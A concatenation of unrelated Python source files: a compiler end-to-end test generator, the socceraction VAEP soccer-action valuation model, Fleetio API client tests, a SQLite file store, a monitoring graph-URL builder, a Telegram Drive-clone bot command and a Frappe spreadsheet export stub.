'test_{0}.ii_check_run_success'.format(yaml_file_name),
create_test_function__check_run_status(p["name"]))
# 3. verify pipelineRun log output
setattr(TestCompilerE2E,
'test_{0}.iii_verify_logs'.format(yaml_file_name),
create_test_function__verify_logs(p["name"], p["log_file"]))
def _generate_test_list(file_name_expr="*.yaml") -> [dict]:
def is_yaml_file_included(yaml_file_path):
yaml_file_name = os.path.basename(yaml_file_path)
test_name = 'test_{0}'.format(os.path.splitext(yaml_file_name)[0])
is_ignored = yaml_file_name in ignored_yaml_files
is_excluded = test_name in EXCLUDE_TESTS
is_included = not INCLUDE_TESTS or test_name in INCLUDE_TESTS
was_failed_if_rerun_failed_only = test_name in previously_failed_tests \
or not RERUN_FAILED_TESTS_ONLY
return not is_ignored and not is_excluded and is_included and was_failed_if_rerun_failed_only
testdata_dir = os.path.join(os.path.dirname(__file__), "testdata")
yaml_files = sorted(filter(is_yaml_file_included, glob(os.path.join(testdata_dir, file_name_expr))))
pipeline_runs = []
for yaml_file in yaml_files:
with open(yaml_file, 'r') as f:
pipeline_run = yaml.safe_load(f)
pipeline_runs.append({
"name": pipeline_run["metadata"]["name"],
"yaml_file": yaml_file,
"log_file": yaml_file.replace(".yaml", ".log")
})
return pipeline_runs
_generate_test_cases(_generate_test_list("*.yaml"))
# =============================================================================
# run the E2E tests as a Python script:
# python3 compiler/compiler_tests_e2e.py
#
# ... as opposed to:
# python3 -m unittest compiler.compiler_tests_e2e
#
# ... because the test_xyz methods are dynamically generated
# =============================================================================
if __name__ == '__main__':
unittest.main(verbosity=TestCompilerE2E.verbosity)
logging.warning("The following pipelines were ignored: {}".format(
", ".join(ignored_yaml_files)))
|
<filename>socceraction/vaep/base.py
# -*- coding: utf-8 -*-
"""Implements the VAEP framework.
Attributes
----------
xfns_default : list(callable)
The default VAEP features.
"""
import math
from typing import Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
from sklearn.exceptions import NotFittedError
from sklearn.metrics import brier_score_loss, roc_auc_score
import socceraction.spadl as spadlcfg
from . import features as fs
from . import formula as vaep
from . import labels as lab
try:
import xgboost
except ImportError:
xgboost = None # type: ignore
try:
import catboost
except ImportError:
catboost = None # type: ignore
try:
import lightgbm
except ImportError:
lightgbm = None # type: ignore
xfns_default = [
fs.actiontype_onehot,
fs.result_onehot,
fs.actiontype_result_onehot,
fs.bodypart_onehot,
fs.time,
fs.startlocation,
fs.endlocation,
fs.startpolar,
fs.endpolar,
fs.movement,
fs.team,
fs.time_delta,
fs.space_delta,
fs.goalscore,
]
class VAEP:
"""
An implementation of the VAEP framework.
VAEP (Valuing Actions by Estimating Probabilities) [1]_ defines the
problem of valuing a soccer player's contributions within a match as
a binary classification problem and rates actions by estimating its effect
on the short-term probablities that a team will both score and concede.
Parameters
----------
xfns : list
List of feature transformers (see :mod:`socceraction.vaep.features`)
used to describe the game states. Uses :attr:`~socceraction.vaep.base.xfns_default`
if None.
nb_prev_actions : int, default=3 # noqa: DAR103
Number of previous actions used to decscribe the game state.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, and <NAME>.
"Actions speak louder than goals: Valuing player actions in soccer." In
Proceedings of the 25th ACM SIGKDD International Conference on Knowledge
Discovery & Data Mining, pp. 1851-1861. 2019.
"""
_spadlcfg = spadlcfg
_fs = fs
_lab = lab
_vaep = vaep
def __init__(
self,
xfns: Optional[List[Callable[[List[pd.DataFrame]], pd.DataFrame]]] = None,
nb_prev_actions: int = 3,
) -> None:
self.__models: Dict[str, Any] = {}
self.xfns = xfns_default if xfns is None else xfns
self.yfns = [self._lab.scores, self._lab.concedes]
self.nb_prev_actions = nb_prev_actions
def compute_features(self, game: pd.Series, game_actions: pd.DataFrame) -> pd.DataFrame:
"""
Transform actions to the feature-based representation of game states.
Parameters
----------
game : pd.Series
The SPADL representation of a single game.
game_actions : pd.DataFrame
The actions performed during `game` in the SPADL representation.
Returns
-------
features : pd.DataFrame
Returns the feature-based representation of each game state in the game.
"""
game_actions_with_names = self._spadlcfg.add_names(game_actions)
gamestates = self._fs.gamestates(game_actions_with_names, self.nb_prev_actions)
gamestates = self._fs.play_left_to_right(gamestates, game.home_team_id)
return pd.concat([fn(gamestates) for fn in self.xfns], axis=1)
def compute_labels(
self, game: pd.Series, game_actions: pd.DataFrame # pylint: disable=W0613
) -> pd.DataFrame:
"""
Compute the labels for each game state in the given game.
Parameters
----------
game : pd.Series
The SPADL representation of a single game.
game_actions : pd.DataFrame
The actions performed during `game` in the SPADL representation.
Returns
-------
labels : pd.DataFrame
Returns the labels of each game state in the game.
"""
game_actions_with_names = self._spadlcfg.add_names(game_actions)
return pd.concat([fn(game_actions_with_names) for fn in self.yfns], axis=1)
def fit(
self,
X: pd.DataFrame,
y: pd.DataFrame,
learner: str = 'xgboost',
val_size: float = 0.25,
tree_params: Optional[Dict[str, Any]] = None,
fit_params: Optional[Dict[str, Any]] = None,
) -> 'VAEP':
"""
Fit the model according to the given training data.
Parameters
----------
X : pd.DataFrame
Feature representation of the game states.
y : pd.DataFrame
Scoring and conceding labels for each game state.
learner : string, default='xgboost' # noqa: DAR103
Gradient boosting implementation which should be used to learn the
model. The supported learners are 'xgboost', 'catboost' and 'lightgbm'.
val_size : float, default=0.25 # noqa: DAR103
Percentage of the dataset that will be used as the validation set
for early stopping. When zero, no validation data will be used.
tree_params : dict
Parameters passed to the constructor of the learner.
fit_params : dict
Parameters passed to the fit method of the learner.
Raises
------
ValueError
If one of the features is missing in the provided dataframe.
Returns
-------
self
Fitted VAEP model.
"""
nb_states = len(X)
idx = np.random.permutation(nb_states)
# fmt: off
train_idx = idx[:math.floor(nb_states * (1 - val_size))]
val_idx = idx[(math.floor(nb_states * (1 - val_size)) + 1):]
# fmt: on
# filter feature columns
cols = self._fs.feature_column_names(self.xfns, self.nb_prev_actions)
if not set(cols).issubset(set(X.columns)):
missing_cols = ' and '.join(set(cols).difference(X.columns))
raise ValueError('{} are not available in the features dataframe'.format(missing_cols))
# split train and validation data
X_train, y_train = X.iloc[train_idx][cols], y.iloc[train_idx]
X_val, y_val = X.iloc[val_idx][cols], y.iloc[val_idx]
# train classifiers F(X) = Y
for col in list(y.columns):
eval_set = [(X_val, y_val[col])] if val_size > 0 else None
if learner == 'xgboost':
self.__models[col] = self._fit_xgboost(
X_train, y_train[col], eval_set, tree_params, fit_params
)
elif learner == 'catboost':
self.__models[col] = self._fit_catboost(
X_train, y_train[col], eval_set, tree_params, fit_params
)
elif learner == 'lightgbm':
self.__models[col] = self._fit_lightgbm(
X_train, y_train[col], eval_set, tree_params, fit_params
)
else:
raise ValueError('A {} learner is not supported'.format(learner))
return self
def _fit_xgboost(
self,
X: pd.DataFrame,
y: pd.Series,
eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
tree_params: Optional[Dict[str, Any]] = None,
fit_params: Optional[Dict[str, Any]] = None,
) -> 'xgboost.XGBClassifier':
if xgboost is None:
raise ImportError('xgboost is not installed.')
# Default settings
if tree_params is None:
tree_params = dict(n_estimators=100, max_depth=3)
if fit_params is None:
fit_params = dict(eval_metric='auc', verbose=True)
if eval_set is not None:
val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
fit_params = {**fit_params, **val_params}
# Train the model
model = xgboost.XGBClassifier(**tree_params)
return model.fit(X, y, **fit_params)
def _fit_catboost(
self,
X: pd.DataFrame,
y: pd.Series,
eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
tree_params: Optional[Dict[str, Any]] = None,
fit_params: Optional[Dict[str, Any]] = None,
) -> 'catboost.CatBoostClassifier':
if catboost is None:
raise ImportError('catboost is not installed.')
# Default settings
if tree_params is None:
tree_params = dict(eval_metric='BrierScore', loss_function='Logloss', iterations=100)
if fit_params is None:
is_cat_feature = [c.dtype.name == 'category' for (_, c) in X.iteritems()]
fit_params = dict(
cat_features=np.nonzero(is_cat_feature)[0].tolist(),
verbose=True,
)
if eval_set is not None:
val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
fit_params = {**fit_params, **val_params}
# Train the model
model = catboost.CatBoostClassifier(**tree_params)
return model.fit(X, y, **fit_params)
def _fit_lightgbm(
self,
X: pd.DataFrame,
y: pd.Series,
eval_set: Optional[List[Tuple[pd.DataFrame, pd.Series]]] = None,
tree_params: Optional[Dict[str, Any]] = None,
fit_params: Optional[Dict[str, Any]] = None,
) -> 'lightgbm.LGBMClassifier':
if lightgbm is None:
raise ImportError('lightgbm is not installed.')
if tree_params is None:
tree_params = dict(n_estimators=100, max_depth=3)
if fit_params is None:
fit_params = dict(eval_metric='auc', verbose=True)
if eval_set is not None:
val_params = dict(early_stopping_rounds=10, eval_set=eval_set)
fit_params = {**fit_params, **val_params}
# Train the model
model = lightgbm.LGBMClassifier(**tree_params)
return model.fit(X, y, **fit_params)
def _estimate_probabilities(self, X: pd.DataFrame) -> pd.DataFrame:
# filter feature columns
cols = self._fs.feature_column_names(self.xfns, self.nb_prev_actions)
if not set(cols).issubset(set(X.columns)):
missing_cols = ' and '.join(set(cols).difference(X.columns))
raise ValueError('{} are not available in the features dataframe'.format(missing_cols))
Y_hat = pd.DataFrame()
for col in self.__models:
Y_hat[col] = [p[1] for p in self.__models[col].predict_proba(X[cols])]
return Y_hat
def rate(
self, game: pd.Series, game_actions: pd.DataFrame, game_states: pd.DataFrame = None
) -> pd.DataFrame:
"""
Compute the VAEP rating for the given game states.
Parameters
----------
game : pd.Series
The SPADL representation of a single game.
game_actions : pd.DataFrame
The actions performed during `game` in the SPADL representation.
game_states : pd.DataFrame, default=None
DataFrame with the game state representation of each action. If
`None`, these will be computed on-th-fly.
Raises
------
NotFittedError
If the model is not fitted yet.
Returns
-------
ratings : pd.DataFrame
Returns the VAEP rating for each given action, as well as the
offensive and defensive value of each action.
"""
if not self.__models:
raise NotFittedError()
game_actions_with_names = self._spadlcfg.add_names(game_actions)
if game_states is None:
game_states = self.compute_features(game, game_actions)
y_hat = self._estimate_probabilities(game_states)
p_scores, p_concedes = y_hat.scores, y_hat.concedes
vaep_values = self._vaep.value(game_actions_with_names, p_scores, p_concedes)
return vaep_values
def score(self, X: pd.DataFrame, y: pd.DataFrame) -> Dict[str, Dict[str, float]]:
"""Evaluate the fit of the model on the given test data and labels.
Parameters
----------
X : pd.DataFrame
Feature representation of the game states.
y : pd.DataFrame
Scoring and conceding labels for each game state.
Raises
------
NotFittedError
If the model is not fitted yet.
Returns
-------
score : dict
The Brier and AUROC scores for both binary classification problems.
"""
if not self.__models:
raise NotFittedError()
y_hat = self._estimate_probabilities(X)
scores: Dict[str, Dict[str, float]] = {}
for col in self.__models:
scores[col] = {}
scores[col]['brier'] = brier_score_loss(y[col], y_hat[col])
scores[col]['auroc'] = roc_auc_score(y[col], y_hat[col])
return scores
|
import os
import pytest
from datetime import date
import time
from fleetio.fleetio import Fleetio
from fleetio.request import Request, RequestPurchaseOrderID, RequestEquipmentID, RequestVehicleID
today = date.today().strftime("%m_%d_%Y")
api_key = os.environ.get('FLEETIO_API_KEY')
account_token = os.environ.get('FLEETIO_ACCOUNT_TOKEN')
f = Fleetio(api_key, account_token)
def test_request():
with pytest.raises(ValueError) as e_info:
r = Request('','',['/hello','/hello/:id', '/hellotoomuch'])
try:
r = Request('','',['/hello','/hello/:id'])
r = Request('','',['/hello'])
r = Request('','','/hello')
r = Request('','','')
assert True
except:
assert False
def test_request_path_selector():
path = ['/hello','/hello/:id']
id = '123'
t = Request._path_selector(path,id)
assert t == '/hello/:id'
path = '/hello'
id = '123'
t = Request._path_selector(path,id)
assert t == path
path = ['/hello','/hello/:id']
id = None
t = Request._path_selector(path,id)
assert t == '/hello'
def test_request_url_id_setter():
path = '/hello/:id'
id = '123'
t = Request._url_id_setter(path,id)
assert t == '/hello/123'
path = '/hello'
id = '123'
t = Request._url_id_setter(path,id)
assert t == '/hello'
def test_request_clean_params():
raw_params = 'name=Fleetio, vehicle=123'
t1 = Request._clean_params(raw_params)
ans = {'name':'Fleetio','vehicle':'123'}
t2 = Request._clean_params(ans)
assert t1 == ans
assert t2 == ans
def test_RequestPurchaseOrderID():
with pytest.raises(ValueError) as e_info:
r = RequestPurchaseOrderID('','',['/hello','/hello/:number', '/hellotoomuch'])
try:
r = RequestPurchaseOrderID('','',['/hello','/hello/:number'])
r = RequestPurchaseOrderID('','',['/hello'])
r = RequestPurchaseOrderID('','','/hello')
r = RequestPurchaseOrderID('','','')
assert True
except:
assert False
def test_RequestPurchaseOrderID_path_selector():
path = ['/hello','/hello/:number']
id = '123'
t = RequestPurchaseOrderID._path_selector(path,id)
assert t == '/hello/:number'
path = '/hello'
id = '123'
t = RequestPurchaseOrderID._path_selector(path,id)
assert t == path
path = ['/hello','/hello/:number']
id = None
t = RequestPurchaseOrderID._path_selector(path,id)
assert t == '/hello'
def test_RequestPurchaseOrderID_url_id_setter():
path = '/hello/:number'
id = '123'
t = RequestPurchaseOrderID._url_id_setter(path,id)
assert t == '/hello/123'
path = '/hello'
id = '123'
t = RequestPurchaseOrderID._url_id_setter(path,id)
assert t == '/hello'
def test_RequestPurchaseOrderID_clean_params():
raw_params = 'name=Fleetio, vehicle=123'
t1 = RequestPurchaseOrderID._clean_params(raw_params)
ans = {'name':'Fleetio','vehicle':'123'}
t2 = RequestPurchaseOrderID._clean_params(ans)
assert t1 == ans
assert t2 == ans
def test_RequestVehicleID():
with pytest.raises(ValueError) as e_info:
r = RequestVehicleID('','',['/hello','/hello/:vehicle_id', '/hellotoomuch'])
try:
r = RequestVehicleID('','',['/hello','/hello/:vehicle_id'])
r = RequestVehicleID('','',['/hello'])
r = RequestVehicleID('','','/hello')
r = RequestVehicleID('','','')
assert True
except:
assert False
def test_RequestVehicleID_path_selector():
path = ['/hello','/hello/:vehicle_id']
id = '123'
t = RequestVehicleID._path_selector(path,id)
assert t == '/hello/:vehicle_id'
path = '/hello'
id = '123'
t = RequestVehicleID._path_selector(path,id)
assert t == path
path = ['/hello','/hello/:vehicle_id']
id = None
t = RequestVehicleID._path_selector(path,id)
assert t == '/hello'
def test_RequestVehicleID_url_id_setter():
path = '/hello/:vehicle_id'
id = '123'
t = RequestVehicleID._url_id_setter(path,id)
assert t == '/hello/123'
path = '/hello'
id = '123'
t = RequestVehicleID._url_id_setter(path,id)
assert t == '/hello'
def test_RequestVehicleID_clean_params():
raw_params = 'name=Fleetio, vehicle=123'
t1 = RequestVehicleID._clean_params(raw_params)
ans = {'name':'Fleetio','vehicle':'123'}
t2 = RequestVehicleID._clean_params(ans)
assert t1 == ans
assert t2 == ans
def test_RequestEquipmentID():
with pytest.raises(ValueError) as e_info:
r = RequestEquipmentID('','',['/hello','/hello/:equipment_id', '/hellotoomuch'])
try:
r = RequestEquipmentID('','',['/hello','/hello/:equipment_id'])
r = RequestEquipmentID('','',['/hello'])
r = RequestEquipmentID('','','/hello')
r = RequestEquipmentID('','','')
assert True
except:
assert False
def test_RequestEquipmentID_path_selector():
path = ['/hello','/hello/:equipment_id']
id = '123'
t = RequestEquipmentID._path_selector(path,id)
assert t == '/hello/:equipment_id'
path = '/hello'
id = '123'
t = RequestEquipmentID._path_selector(path,id)
assert t == path
path = ['/hello','/hello/:equipment_id']
id = None
t = RequestEquipmentID._path_selector(path,id)
assert t == '/hello'
def test_RequestEquipmentID_url_id_setter():
path = '/hello/:equipment_id'
id = '123'
t = RequestEquipmentID._url_id_setter(path,id)
assert t == '/hello/123'
path = '/hello'
id = '123'
t = RequestEquipmentID._url_id_setter(path,id)
assert t == '/hello'
def test_RequestEquipmentID_clean_params():
raw_params = 'name=Fleetio, vehicle=123'
t1 = RequestEquipmentID._clean_params(raw_params)
ans = {'name':'Fleetio','vehicle':'123'}
t2 = RequestEquipmentID._clean_params(ans)
assert t1 == ans
assert t2 == ans
|
<gh_stars>0
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
#
# Copyright (C) <NAME> 2019
#
import sqlite3
from FileTools import *
class FileServerDatabase:
_databaseFile = ":memory"
_connection = None
_cursor = None
def __init__(self):
self._databaseFile = "fileStore.db"
self._connection = sqlite3.connect(self._databaseFile)
c = self._connection.cursor()
c.execute("ATTACH DATABASE '%s' AS 'FileStore';" % (self._databaseFile))
self._connection.commit()
def __del__(self):
self._connection.close()
def _createFilesTable(self):
c = self._connection.cursor()
try:
c.execute("SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'files';")
except:
c.execute("""CREATE TABLE `files`(
`files_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`fileMD5_id` INTEGER,
`fileSHA1_id` INTEGER,
`fileDetails_id` INTEGER,
`fileContent_id` INTEGER
);""")
self._connection.commit()
def _createFileMD5Table(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileMD5';""")
except:
c.execute("""CREATE TABLE `fileMD5`(
`fileMD5_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`MD5Hash` TEXT UNIQUE
);""")
self._connection.commit()
def _createFileSHA1Table(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileSHA1';""")
except:
c.execute("""CREATE TABLE `fileSHA1`(
`fileSHA1_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`SHA1Hash` TEXT UNIQUE
);""")
self._connection.commit()
def _createFileDetailsTable(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileDetails';""")
except:
c.execute("""CREATE TABLE `fileDetails`(
`fileDetails_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`fileName` TEXT,
`fileDescription` TEXT,
`fileSize` INTEGER
);""")
self._connection.commit()
def _createFileContentTable(self):
c = self._connection.cursor()
try:
c.execute("""SELECT name FROM sqlite_sequence WHERE type = 'table' AND name = 'fileContent';""")
except:
c.execute("""CREATE TABLE `fileContent`(
`fileContent_id` INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,
`files_id` INTEGER,
`fileBlob` BLOB
);""")
self._connection.commit()
def createDatabaseTables(self):
self._createFilesTable()
self._createFileMD5Table()
self._createFileSHA1Table()
self._createFileContentTable()
self._createFileDetailsTable()
def deleteDatabaseTables(self):
c = self._connection.cursor()
c.execute("DROP TABLE files;")
c.execute("DROP TABLE fileMD5;")
c.execute("DROP TABLE fileSHA1;")
c.execute("DROP TABLE fileDetails;")
c.execute("DROP TABLE fileContent;")
self._connection.commit()
def getFileContentFromName(self, fileName):
c = self._connection.cursor()
c.execute("""SELECT fileBlob FROM files
INNER JOIN fileContent ON fileContent.files_id = files.files_id
INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
WHERE fileName = :fileName;""", {"fileName": fileName})
return c.fetchall()
def getFileMD5FromName(self, fileName):
c = self._connection.cursor()
c.execute("""SELECT MD5Hash FROM files
INNER JOIN fileContent ON fileContent.files_id = files.files_id
INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
INNER JOIN fileMD5 on fileMD5.files_id = fileDetails.files_id
WHERE fileName = :fileName;""", {"fileName": fileName})
return c.fetchall()
def getFileSHA1FromName(self, fileName):
c = self._connection.cursor()
c.execute("""SELECT SHA1Hash FROM files
INNER JOIN fileContent ON fileContent.files_id = files.files_id
INNER JOIN fileDetails ON fileDetails.files_id = fileContent.files_id
INNER JOIN fileSHA1 on fileSHA1.files_id = fileDetails.files_id
WHERE fileName = :fileName;""", {"fileName": fileName})
return c.fetchall()
def insertFile(self, fileName):
try:
f = open(fileName, "rb")
data = f.read()
f.close()
c = self._connection.cursor()
c.execute("INSERT INTO fileDetails (fileName) VALUES (:name);", {"name": fileName})
c.execute("SELECT fileDetails_id FROM fileDetails ORDER BY fileDetails_id desc;")
details_id = c.fetchone()
c.execute("INSERT INTO fileContent (fileBlob) VALUES (:data)", (sqlite3.Binary(data),))
c.execute("SELECT fileContent_id FROM fileContent ORDER BY fileContent_id desc;")
content_id = c.fetchone()
c.execute("INSERT INTO files (fileDetails_id, fileContent_id) VALUES (:details_id, :content);", {"details_id": details_id[0], "content": content_id[0]})
c.execute("SELECT files_id FROM files ORDER BY files_id desc;")
files_id = c.fetchone()
c.execute("UPDATE fileDetails SET files_id = :files_id WHERE fileDetails_id = :fileDetails_id;", {"files_id": files_id[0], "fileDetails_id": details_id[0]})
c.execute("UPDATE fileContent SET files_id = :files_id WHERE fileContent_id = :fileContent_id;", {"files_id": files_id[0], "fileContent_id": content_id[0]})
md5sum = generateMd5Hash(data)
c.execute("INSERT INTO fileMD5 (files_id, MD5Hash) VALUES (:files_id, :md5);", {"files_id": files_id[0], "md5": md5sum})
c.execute("SELECT fileMD5_id FROM fileMD5 ORDER BY fileMD5_id desc;")
md5_id = c.fetchone()
sha1sum = generateSha1Hash(data)
c.execute("INSERT INTO fileSHA1 (files_id, SHA1Hash) VALUES (:files_id, :sha1);", {"files_id": files_id[0], "sha1": sha1sum})
c.execute("SELECT fileSHA1_id FROM fileSHA1 ORDER BY fileSHA1_id desc;")
sha1_id = c.fetchone()
c.execute("UPDATE files SET fileMD5_id = :md5 WHERE files_id = :files_id;", {"md5": md5_id[0], "files_id": files_id[0]})
c.execute("UPDATE files SET fileSHA1_id = :sha1 WHERE files_id = :files_id;", {"sha1": sha1_id[0], "files_id": files_id[0]})
self._connection.commit()
return True
except sqlite3.IntegrityError as integerr:
print("File already in DB")
self._connection.rollback()
return True
except Exception as e:
print(str(e))
self._connection.rollback()
raise(e)
#def getDetailsFromFileName(self, fileName):
|
<filename>rrd/utils/graph_urls.py
#-*- coding:utf-8 -*-
# Copyright 2017 Xiaomi, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import copy
import re
from rrd import config
from rrd.model.tmpgraph import TmpGraph
from rrd.model.endpoint import Endpoint, EndpointCounter
from rrd.config import today_date_str
def generate_graph_urls(graph, start, end):
print today_date_str(),"generate_graph_urls_start",graph.counters
counters = graph.counters or []
if not counters:
return []
endpoint_list = graph.hosts or []
if not endpoint_list:
return []
endpoint_objs = Endpoint.gets_by_endpoint(endpoint_list)
print today_date_str(),"generate_graph_urls_endpoint_objs"
if not endpoint_objs:
return []
endpoint_ids = [x.id for x in endpoint_objs]
counters = []
print today_date_str(), len(graph.counters)
for c in graph.counters:
print today_date_str(),"c",c
if c.find("metric=") == -1:
counters.append(c)
else:
metric=""
tags = []
qs = []
c = c.strip()
for q in c.split():
q = q.strip()
if q.startswith("metric="):
metric = q.replace("metric=", "^", 1)
qs.append(metric)
else:
qs.append(q)
tags.append(q)
print "counter_objs_start"
counter_objs = EndpointCounter.search_in_endpoint_ids(qs, endpoint_ids[:], limit=100)
print "counter_objs",counter_objs
if not counter_objs:
continue
for co in counter_objs:
if not re.search('^%s(/|$)' %metric, co.counter):
continue
matched = True
for tag in tags:
if not re.search('(/|,)%s(,|$)' %tag, co.counter):
matched = False
break
if not matched:
continue
counters.append(co.counter)
if not counters:
return []
counters = sorted(list(set(counters)))
return _generate_graph_urls(graph, counters, endpoint_list, start, end)
def _generate_graph_urls(graph, counters, endpoint_list, start, end):
print today_date_str(),"_generate_graph_urls_start"
ret_graphs = []
print today_date_str(),"graph.graph_type",graph.graph_type
if graph.graph_type == 'h':
for c in counters:
print today_date_str(), "tmp_graph_id_start"
tmp_graph_id = TmpGraph.add(endpoint_list, [c,])
if not tmp_graph_id:
break
new_g = copy.deepcopy(graph)
new_g.counters = c
if end:
new_g.src = '''/chart/h?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
else:
new_g.src = '''/chart/h?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
if graph.method == 'SUM':
new_g.src += "&sum=on"
else:
new_g.src += "&cf=%s" %graph.method
ret_graphs.append(new_g)
elif graph.graph_type=='k':
for e in endpoint_list:
tmp_graph_id = TmpGraph.add([e,], counters)
if not tmp_graph_id:
break
new_g = copy.deepcopy(graph)
new_g.hosts = e
if end:
new_g.src = '''/chart/k?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
else:
new_g.src = '''/chart/k?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
if graph.method == 'SUM':
new_g.src += "&sum=on"
else:
new_g.src += "&cf=%s" %graph.method
ret_graphs.append(new_g)
else:
#组合视角
tmp_graph_id = TmpGraph.add(endpoint_list, counters)
if not tmp_graph_id:
return []
new_g = copy.deepcopy(graph)
if end:
new_g.src = '''/chart/a?id=%s&start=%s&end=%s''' %(tmp_graph_id, start or (0-graph.timespan), end)
else:
new_g.src = '''/chart/a?id=%s&start=%s''' %(tmp_graph_id, start or (0-graph.timespan))
if graph.method == 'SUM':
new_g.src += "&sum=on"
else:
new_g.src += "&cf=%s" %graph.method
ret_graphs.append(new_g)
return ret_graphs
|
import random
import string
from telegram.ext import CommandHandler
from bot.helper.mirror_utils.upload_utils.gdriveTools import GoogleDriveHelper
from bot.helper.telegram_helper.message_utils import sendMessage, sendMarkup, deleteMessage, delete_all_messages, update_all_messages, sendStatusMessage
from bot.helper.telegram_helper.filters import CustomFilters
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot.helper.mirror_utils.status_utils.clone_status import CloneStatus
from bot import dispatcher, LOGGER, CLONE_LIMIT, STOP_DUPLICATE, download_dict, download_dict_lock, Interval
from bot.helper.ext_utils.bot_utils import get_readable_file_size, is_gdrive_link, is_gdtot_link, new_thread
from bot.helper.mirror_utils.download_utils.direct_link_generator import gdtot
from bot.helper.ext_utils.exceptions import DirectDownloadLinkException
@new_thread
def cloneNode(update, context):
args = update.message.text.split(" ", maxsplit=1)
reply_to = update.message.reply_to_message
link = ''
if len(args) > 1:
link = args[1]
if update.message.from_user.username:
tag = f"@{update.message.from_user.username}"
else:
tag = update.message.from_user.mention_html(update.message.from_user.first_name)
if reply_to is not None:
if len(link) == 0:
link = reply_to.text
if reply_to.from_user.username:
tag = f"@{reply_to.from_user.username}"
else:
tag = reply_to.from_user.mention_html(reply_to.from_user.first_name)
is_gdtot = is_gdtot_link(link)
if is_gdtot:
try:
msg = sendMessage(f"Processing: <code>{link}</code>", context.bot, update.message)
link = gdtot(link)
deleteMessage(context.bot, msg)
except DirectDownloadLinkException as e:
deleteMessage(context.bot, msg)
return sendMessage(str(e), context.bot, update.message)
if is_gdrive_link(link):
gd = GoogleDriveHelper()
res, size, name, files = gd.helper(link)
if res != "":
return sendMessage(res, context.bot, update.message)
if STOP_DUPLICATE:
LOGGER.info('Checking File/Folder if already in Drive...')
smsg, button = gd.drive_list(name, True, True)
if smsg:
msg3 = "File/Folder is already available in Drive.\nHere are the search results:"
return sendMarkup(msg3, context.bot, update.message, button)
if CLONE_LIMIT is not None:
LOGGER.info('Checking File/Folder Size...')
if size > CLONE_LIMIT * 1024**3:
msg2 = f'Failed, Clone limit is {CLONE_LIMIT}GB.\nYour File/Folder size is {get_readable_file_size(size)}.'
return sendMessage(msg2, context.bot, update.message)
if files <= 20:
msg = sendMessage(f"Cloning: <code>{link}</code>", context.bot, update.message)
result, button = gd.clone(link)
deleteMessage(context.bot, msg)
else:
drive = GoogleDriveHelper(name)
gid = ''.join(random.SystemRandom().choices(string.ascii_letters + string.digits, k=12))
clone_status = CloneStatus(drive, size, update.message, gid)
with download_dict_lock:
download_dict[update.message.message_id] = clone_status
sendStatusMessage(update.message, context.bot)
result, button = drive.clone(link)
with download_dict_lock:
del download_dict[update.message.message_id]
count = len(download_dict)
try:
if count == 0:
Interval[0].cancel()
del Interval[0]
delete_all_messages()
else:
update_all_messages()
except IndexError:
pass
cc = f'\n\n<b>cc: </b>{tag}'
if button in ["cancelled", ""]:
sendMessage(f"{tag} {result}", context.bot, update.message)
else:
sendMarkup(result + cc, context.bot, update.message, button)
if is_gdtot:
gd.deletefile(link)
else:
sendMessage('Send Gdrive or gdtot link along with command or by replying to the link by command', context.bot, update.message)
clone_handler = CommandHandler(BotCommands.CloneCommand, cloneNode, filters=CustomFilters.authorized_chat | CustomFilters.authorized_user, run_async=True)
dispatcher.add_handler(clone_handler)
|
from __future__ import unicode_literals
import math
import frappe
from frappe.utils import cstr, add_days, date_diff, getdate, format_date
from frappe import _, bold
from frappe.utils.csvutils import UnicodeWriter, read_csv_content
from frappe.utils.data import format_date
from frappe.utils.file_manager import get_file
from frappe.model.document import Document
from frappe.utils.background_jobs import enqueue
from datetime import date, timedelta, datetime
import openpyxl
from openpyxl import Workbook
import openpyxl
import xlrd
import re
from openpyxl.styles import Font, Alignment, Border, Side
from openpyxl import load_workbook
from openpyxl.utils import get_column_letter
from openpyxl.styles import GradientFill, PatternFill
from six import BytesIO, string_types
@frappe.whitelist()
def download():
filename = 'cl plan shortage'
test = build_xlsx_response(filename)
# return xlsx file object
def make_xlsx(data, sheet_name=None, wb=None, column_widths=None):
args = frappe.local.form_dict
column_widths = column_widths or []
if wb is None:
wb = openpyxl.Workbook()
ws = wb.create_sheet(sheet_name, 0)
header = add_header(args)
ws.append(header)
header = add_day_header(args)
ws.append(header)
header = add_header_emp_type(args)
ws.append(header)
data = get_data(args)
for row in data:
ws.append(row)
ws.sheet_view.zoomScale = 70
xlsx_file = BytesIO()
wb.save(xlsx_file)
return xlsx_file
def build_xlsx_response(filename):
xlsx_file = make_xlsx(filename)
# write out response as a xlsx type
frappe.response['filename'] = filename + '.xlsx'
